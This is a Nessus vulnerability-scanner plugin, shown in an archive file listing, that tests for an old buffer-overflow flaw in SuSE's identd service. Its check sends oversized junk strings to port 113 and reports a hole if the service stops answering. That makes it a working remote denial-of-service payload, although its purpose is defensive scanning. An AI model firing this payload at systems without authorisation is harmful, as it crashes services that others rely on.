home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / modules / nessus-2.2.8.mo / usr / lib / nessus / plugins / suse_identd.nasl < prev    next >
Text File  |  2005-01-14  |  3KB  |  93 lines
  1. #
  2. # This script was written by Renaud Deraison <deraison@cvs.nessus.org>
  3. #
  4. # See the Nessus Scripts License for details
  5. #
  6. ##############
  7. # References:
  8. ##############
  9. #
  10. # Date: Sun, 15 Sep 2002 04:04:09 +0000
  11. # From: "Lance Fitz-Herbert" <fitzies@HOTMAIL.COM>
  12. # Subject: Trillian .74 and below, ident flaw.
  13. # To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
  14. #
  15.  
  16. if(description)
  17. {
  18.  script_id(10560);
  19.  script_bugtraq_id(587);
  20. script_cve_id("CVE-1999-0746");
  21.  script_version ("$Revision: 1.10 $");
  22.  
  23.  
  24.  name["english"] = "SuSE's identd overflow";
  25.  name["francais"] = "Buffer overflow dans le identd de SuSE";
  26.  script_name(english:name["english"], francais:name["francais"]);
  27.  
  28.  desc["english"] = "
  29. Ident is a protocol which gives to the remote server
  30. the name of the user who initiated a given connection.
  31. It's mainly used by IRC, SMTP and POP servers to obtain
  32. the login name of the person who is using their services.
  33.  
  34. There is a flaw in the remote identd daemon which allows anyone
  35. to crash this service remotely.
  36.  
  37. Solution : disable this service if you do not use it, or upgrade
  38. Risk factor : Low";
  39.  
  40.  desc["francais"] = "
  41. Ident est un protocole qui permet α un serveur donnΘ d'obtenir
  42. le nom de l'utilisateur qui a Θtablit une connection avec lui.
  43. Il est principalement utilisΘ par les serveur d'IRC, SMTP et POP
  44. pour enregistrer le nom de login de la personne qui utilise leurs
  45. services.
  46.  
  47. Il y a un bug dans le service identd distant qui permet α n'importe
  48. qui de faire planter ce service α distance.
  49.  
  50. Solution : dΘsactivez ce service si vous ne l'utilisez pas, ou bien
  51. mettez votre daemon α jour
  52. Facteur de risque : Faible";
  53.  
  54.  script_description(english:desc["english"], francais:desc["francais"]);
  55.  
  56.  summary["english"] = "crashes the remote identd";
  57.  summary["francais"] = "plantes le identd distant";
  58.  script_summary(english:summary["english"], francais:summary["francais"]);
  59.  
  60.  script_category(ACT_DENIAL);
  61.  
  62.  
  63.  script_copyright(english:"This script is Copyright (C) 2000 Renaud Deraison",
  64.         francais:"Ce script est Copyright (C) 2000 Renaud Deraison");
  65.  family["english"] = "Denial of Service";
  66.  family["francais"] = "DΘni de service";
  67.  script_family(english:family["english"], francais:family["francais"]);
  68.  script_dependencie("find_service.nes");
  69.  script_require_ports("Services/auth", 113);
  70.  exit(0);
  71. }
  72.  
  73. #
  74. # The script code starts here
  75. #
  76.  
  77. port = get_kb_item("Services/auth");
  78. if(!port) port = 113;
  79. if(!get_port_state(port))exit(0);
  80.  
  81.  
  82. soc = open_sock_tcp(port);
  83. if(soc)
  84. {
  85.  req = string(crap(4096), ",", crap(4096), "\r\n");
  86.  send(socket:soc, data:req);
  87.  sleep(2);
  88.  close(soc);
  89.  
  90.  soc = open_sock_tcp(port);
  91.  if(!soc)security_hole(port);
  92. }
  93.